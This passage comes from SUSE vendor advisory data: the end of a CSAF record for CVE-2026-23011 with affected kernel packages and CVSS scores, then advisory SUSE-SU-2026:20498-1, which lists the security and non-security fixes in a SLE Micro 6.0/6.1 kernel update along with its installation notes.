"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-23011"
}
]
}
SUSE-SU-2026:20498-1
Vulnerability from csaf_suse - Published: 2026-02-24 09:10 - Updated: 2026-02-24 09:10Summary
Security update for the Linux Kernel
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel
Description of the patch:
The SUSE Linux Enterprise Micro 6.0 and Micro 6.1 kernel was updated to fix various security issues
The following security issues were fixed:
- CVE-2023-54013: interconnect: Fix locking for runpm vs reclaim (bsc#1256280).
- CVE-2025-38321: smb: Log an error when close_all_cached_dirs fails (bsc#1246328).
- CVE-2025-38728: smb3: fix for slab out of bounds on mount to ksmbd (bsc#1249256).
- CVE-2025-39880: libceph: fix invalid accesses to ceph_connection_v1_info (bsc#1250388).
- CVE-2025-39890: wifi: ath12k: fix memory leak in ath12k_service_ready_ext_event (bsc#1250334).
- CVE-2025-39977: futex: Prevent use-after-free during requeue-PI (bsc#1252046).
- CVE-2025-40006: mm/hugetlb: fix folio is still mapped when deleted (bsc#1252342).
- CVE-2025-40024: vhost: Take a reference on the task in struct vhost_task (bsc#1252686).
- CVE-2025-40033: remoteproc: pru: Fix potential NULL pointer dereference in pru_rproc_set_ctable() (bsc#1252824).
- CVE-2025-40042: tracing: Fix race condition in kprobe initialization causing NULL pointer dereference (bsc#1252861).
- CVE-2025-40053: net: dlink: handle copy_thresh allocation failure (bsc#1252808).
- CVE-2025-40081: perf: arm_spe: Prevent overflow in PERF_IDX2OFF() (bsc#1252776).
- CVE-2025-40102: KVM: arm64: Prevent access to vCPU events before init (bsc#1252919).
- CVE-2025-40123: bpf: Enforce expected_attach_type for tailcall compatibility (bsc#1253365).
- CVE-2025-40134: dm: fix NULL pointer dereference in __dm_suspend() (bsc#1253386).
- CVE-2025-40135: ipv6: use RCU in ip6_xmit() (bsc#1253342).
- CVE-2025-40153: mm: hugetlb: avoid soft lockup when mprotect to large memory area (bsc#1253408).
- CVE-2025-40158: ipv6: use RCU in ip6_output() (bsc#1253402).
- CVE-2025-40160: xen/events: Cleanup find_virq() return codes (bsc#1253400).
- CVE-2025-40167: ext4: detect invalid INLINE_DATA + EXTENTS flag combination (bsc#1253458).
- CVE-2025-40170: net: use dst_dev_rcu() in sk_setup_caps() (bsc#1253413).
- CVE-2025-40178: pid: Add a judgment for ns null in pid_nr_ns (bsc#1253463).
- CVE-2025-40179: ext4: verify orphan file size is not too big (bsc#1253442).
- CVE-2025-40187: net/sctp: fix a null dereference in sctp_disposition sctp_sf_do_5_1D_ce() (bsc#1253647).
- CVE-2025-40190: ext4: guard against EA inode refcount underflow in xattr update (bsc#1253623).
- CVE-2025-40215: kABI: xfrm: delete x->tunnel as we delete x (bsc#1254959).
- CVE-2025-40220: fuse: fix livelock in synchronous file put from fuseblk workers (bsc#1254520).
- CVE-2025-40231: vsock: fix lock inversion in vsock_assign_transport() (bsc#1254815).
- CVE-2025-40233: ocfs2: clear extent cache after moving/defragmenting extents (bsc#1254813).
- CVE-2025-40238: net/mlx5: Fix IPsec cleanup over MPV device (bsc#1254871).
- CVE-2025-40240: sctp: avoid NULL dereference when chunk data buffer is missing (bsc#1254869).
- CVE-2025-40242: gfs2: Fix unlikely race in gdlm_put_lock (bsc#1255075).
- CVE-2025-40248: vsock: Ignore signal/timeout on connect() if already established (bsc#1254864).
- CVE-2025-40250: net/mlx5: Clean up only new IRQ glue on request_irq() failure (bsc#1254854).
- CVE-2025-40251: devlink: rate: Unset parent pointer in devl_rate_nodes_destroy (bsc#1254856).
- CVE-2025-40252: net: qlogic/qede: fix potential out-of-bounds read in qede_tpa_cont() and qede_tpa_end() (bsc#1254849).
- CVE-2025-40254: net: openvswitch: remove never-working support for setting nsh fields (bsc#1254852).
- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1254843).
- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).
- CVE-2025-40261: nvme: nvme-fc: Ensure ->ioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).
- CVE-2025-40264: be2net: pass wrb_params in case of OS2BMC (bsc#1254835).
- CVE-2025-40268: cifs: client: fix memory leak in smb3_fs_context_parse_param (bsc#1255082).
- CVE-2025-40271: fs/proc: fix uaf in proc_readdir_de() (bsc#1255297).
- CVE-2025-40274: KVM: guest_memfd: Remove bindings on memslot deletion when gmem is dying (bsc#1254830).
- CVE-2025-40278: net: sched: act_ife: initialize struct tc_ife to fix KMSAN kernel-infoleak (bsc#1254825).
- CVE-2025-40279: net: sched: act_connmark: initialize struct tc_ife to fix kernel leak (bsc#1254846).
- CVE-2025-40280: tipc: Fix use-after-free in tipc_mon_reinit_self() (bsc#1254847).
- CVE-2025-40287: exfat: fix improper check of dentry.stream.valid_size (bsc#1255030).
- CVE-2025-40289: drm/amdgpu: hide VRAM sysfs attributes on GPUs without VRAM (bsc#1255042).
- CVE-2025-40292: virtio-net: fix received length check in big packets (bsc#1255175).
- CVE-2025-40293: iommufd: Don't overflow during division for dirty tracking (bsc#1255179).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255187).
- CVE-2025-40307: exfat: validate cluster allocation bits of the allocation bitmap (bsc#1255039).
- CVE-2025-40319: bpf: Sync pending IRQ work before freeing ring buffer (bsc#1254794).
- CVE-2025-40328: smb: client: fix potential UAF in smb2_close_cached_fid() (bsc#1254624).
- CVE-2025-40331: sctp: Prevent TOCTOU out-of-bounds write (bsc#1254615).
- CVE-2025-40337: net: stmmac: Correctly handle Rx checksum offload errors (bsc#1255081).
- CVE-2025-40338: ASoC: Intel: avs: Do not share the name pointer between components (bsc#1255273).
- CVE-2025-40339: drm/amdgpu: fix nullptr err of vm_handle_moved (bsc#1255428).
- CVE-2025-40346: arch_topology: Fix incorrect error check in topology_parse_cpu_capacity() (bsc#1255318).
- CVE-2025-40350: net/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ (bsc#1255260).
- CVE-2025-40355: sysfs: check visibility before changing group attribute ownership (bsc#1255261).
- CVE-2025-40360: drm/sysfb: Do not dereference NULL pointer in plane reset (bsc#1255095).
- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).
- CVE-2025-68171: x86/fpu: Ensure XFD state on signal delivery (bsc#1255255).
- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).
- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).
- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).
- CVE-2025-68190: drm/amdgpu/atom: Check kcalloc() for WS buffer in amdgpu_atom_execute_table_locked() (bsc#1255131).
- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).
- CVE-2025-68201: drm/amdgpu: remove two invalid BUG_ON()s (bsc#1255136).
- CVE-2025-68204: pmdomain: arm: scmi: Fix genpd leak on provider registration failure (bsc#1255224).
- CVE-2025-68206: netfilter: nft_ct: add seqadj extension for natted connections (bsc#1255142).
- CVE-2025-68208: bpf: account for current allocated stack depth in widen_imprecise_scalars() (bsc#1255227).
- CVE-2025-68209: mlx5: Fix default values in create CQ (bsc#1255230).
- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).
- CVE-2025-68230: drm/amdgpu: fix gpu page fault after hibernation on PF passthrough (bsc#1255134).
- CVE-2025-68239: binfmt_misc: restore write access before closing files opened by open_exec() (bsc#1255272).
- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).
- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).
- CVE-2025-68255: staging: rtl8723bs: fix stack buffer overflow in OnAssocReq IE parsing (bsc#1255395).
- CVE-2025-68259: KVM: SVM: Don't skip unrelated instruction if INT3/INTO is replaced (bsc#1255199).
- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).
- CVE-2025-68264: ext4: refresh inline data size before write operations (bsc#1255380).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255377).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255401).
- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).
- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).
- CVE-2025-68301: net: atlantic: fix fragment overflow handling in RX path (bsc#1255120).
- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).
- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).
- CVE-2025-68327: usb: renesas_usbhs: Fix synchronous external abort on unbind (bsc#1255488).
- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).
- CVE-2025-68340: team: Move team device type change at the end of team_port_add (bsc#1255507).
- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).
- CVE-2025-68363: bpf: Check skb->transport_header is set in bpf_skb_check_mtu (bsc#1255552).
- CVE-2025-68365: fs/ntfs3: Initialize allocated memory before use (bsc#1255548).
- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).
- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).
- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).
- CVE-2025-68378: bpf: Refactor stack map trace depth calculation into helper function (bsc#1255614).
- CVE-2025-68379: RDMA/rxe: Fix null deref on srq->rq.queue after resize failure (bsc#1255695).
- CVE-2025-68727: ntfs3: Fix uninit buffer allocated by __getname() (bsc#1255568).
- CVE-2025-68728: ntfs3: fix uninit memory after failed mi_read in mi_format_new (bsc#1255539).
- CVE-2025-68733: smack: fix bug: unprivileged task can create labels (bsc#1255615).
- CVE-2025-68742: bpf: Improve program stats run-time calculation (bsc#1255707).
- CVE-2025-68744: bpf: Free special fields when update [lru_,]percpu_hash maps (bsc#1255709).
- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).
- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).
- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).
- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).
- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).
- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).
- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).
- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).
- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).
- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).
- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).
- CVE-2025-68803: nfsd: set security label during create operations (bsc#1256770).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).
- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).
- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).
- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).
- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).
- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).
- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).
- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).
- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).
- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).
- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).
- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).
- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).
- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).
- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).
- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).
- CVE-2025-71096: RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly (bsc#1256606).
- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).
- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).
- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).
- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).
- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).
- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).
- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).
- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).
- CVE-2025-71137: octeontx2-pf: fix "UBSAN: shift-out-of-bounds error" (bsc#1256760).
- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).
- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).
- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).
- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).
- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).
- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).
- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).
- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).
- CVE-2026-22996: net/mlx5e: Don't store mlx5e_priv in mlx5e_dev devlink priv.
- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).
- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).
- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).
- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).
- CVE-2026-23010: ipv6: Fix use-after-free in inet6_addr_del() (bsc#1257332).
- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).
The following non security issues were fixed:
- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).
- Disable CONFIG_CPU5_WDT The cpu5wdt driver doesn't implement a
proper watchdog interface and has many code issues. It only handles
obscure and obsolete hardware. Stop building and supporting this driver
(jsc#PED-14062).
- Update config files (jsc#PED-12554 jsc#PED-6996
bsc#1243677 ltc#213602 bsc#1243678 ltc#213596)
CONFIG_IMA_KEYRINGS_PERMIT_SIGNED_BY_BUILTIN_OR_SECONDARY=y
CONFIG_INTEGRITY_CA_MACHINE_KEYRING_MAX=y
- Update config files: disable CONFIG_DEVPORT for arm64 (bsc#1256792)
- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).
- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).
- cifs: Fix copy offload to flush destination region (bsc#1252511).
- cifs: Fix flushing, invalidation and file size with copy_file_range() (bsc#1252511).
- cifs: Fix uncached read into ITER_KVEC iterator (bsc#1245449).
- cifs: make cifs_chan_update_iface() a void function (git-fixes).
- cifs: update dstaddr whenever channel iface is updated (git-fixes).
- cpuidle: menu: Use residency threshold in polling state override decisions (bsc#1255026).
- dm: fix queue start/stop imbalance under suspend/load/resume races (bsc#1253386)
- drm/amdgpu: update mappings not managed by KFD (bsc#1255428)
- ext4: use optimized mballoc scanning regardless of inode format (bsc#1254378).
- ext4: wait for ongoing I/O to complete before freeing blocks (bsc#1256366).
- fs: dlm: allow to F_SETLKW getting interrupted (bsc#1255025).
- ice: use netif_get_num_default_rss_queues() (bsc#1247712).
- media: atomisp: Prefix firmware paths with "intel/ipu/" (bsc#1252973).
- media: atomisp: Remove firmware_name module parameter (bsc#1252973).
- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1254447 bsc#1253087).
- net: hv_netvsc: reject RSS hash key programming without RX indirection table (bsc#1257473).
- net: tcp: allow zero-window ACK update the window (bsc#1254767).
- net: usb: pegasus: fix memory leak in update_eth_regs_async() (git-fixes).
- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).
- powerpc/eeh: fix recursive pci_lock_rescan_remove locking in EEH event
handling (bsc#1253262 ltc#216029).
- powerpc/kexec: Enable SMT before waking offline CPUs (bsc#1214285
bsc#1205462 ltc#200161 ltc#200588 git-fixes bsc#1253739 ltc#211493
bsc#1254244 ltc#216496).
- sched: Increase sched_tick_remote timeout (bsc#1254510).
- scsi: lpfc: Add capability to register Platform Name ID to fabric (bsc#1254119).
- scsi: lpfc: Allow support for BB credit recovery in point-to-point topology (bsc#1254119).
- scsi: lpfc: Ensure unregistration of rpis for received PLOGIs (bsc#1254119).
- scsi: lpfc: Fix leaked ndlp krefs when in point-to-point topology (bsc#1254119).
- scsi: lpfc: Fix reusing an ndlp that is marked NLP_DROPPED during FLOGI (bsc#1254119).
- scsi: lpfc: Modify kref handling for Fabric Controller ndlps (bsc#1254119).
- scsi: lpfc: Remove redundant NULL ptr assignment in lpfc_els_free_iocb() (bsc#1254119).
- scsi: lpfc: Revise discovery related function headers and comments (bsc#1254119).
- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256861).
- scsi: lpfc: Update lpfc version to 14.4.0.12 (bsc#1254119).
- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256861).
- scsi: lpfc: Update various NPIV diagnostic log messaging (bsc#1254119).
- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256863).
- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256863).
- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256863).
- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256863).
- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256863).
- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256863).
- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256863).
- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256863).
- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256863).
- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256863).
- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256863).
- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256863).
- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).
- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748,bsc#1257154).
- smb: client: update cfid->last_access_time in open_cached_dir_by_dentry() (git-fixes).
- smb: improve directory cache reuse for readdir operations (bsc#1252712).
- soc/tegra: fuse: speedo-tegra210: Update speedo IDs (git-fixes).
- spi: tegra210-quad: Check hardware status on timeout (bsc#1253155)
- spi: tegra210-quad: Fix timeout handling (bsc#1253155)
- spi: tegra210-quad: Refactor error handling into helper functions (bsc#1253155)
- spi: tegra210-quad: Update dummy sequence configuration (git-fixes)
- supported.conf: Mark lan 743x supported (jsc#PED-14571)
- tracing: Fix access to trace_event_file (bsc#1254373).
- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).
- x86/microcode/AMD: Add TSA microcode SHAs (bsc#1256528).
- x86/microcode/AMD: Add Zen5 model 0x44, stepping 0x1 minrev (bsc#1256528).
- x86/microcode/AMD: Add more known models to entry sign checking (bsc#1256528).
- x86/microcode/AMD: Add some forgotten models to the SHA check (bsc#1256528).
- x86/microcode/AMD: Clean the cache if update did not load microcode (bsc#1256528).
- x86/microcode/AMD: Extend the SHA check to Zen5, block loading of any
unreleased standalone Zen5 microcode patches (bsc#1256528).
- x86/microcode/AMD: Fix Entrysign revision check for Zen5/Strix Halo (bsc#1256528).
- x86/microcode/AMD: Fix __apply_microcode_amd()'s return value (bsc#1256528).
- x86/microcode/AMD: Limit Entrysign signature checking to known generations (bsc#1256528).
- x86/microcode/AMD: Load only SHA256-checksummed patches (bsc#1256528).
- x86/microcode/AMD: Select which microcode patch to load (bsc#1256528).
- x86/microcode/AMD: Use sha256() instead of init/update/final (bsc#1256528).
- x86/microcode: Fix Entrysign revision check for Zen1/Naples (bsc#1256528).
Patchnames: SUSE-SLE-Micro-6.1-kernel-281
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
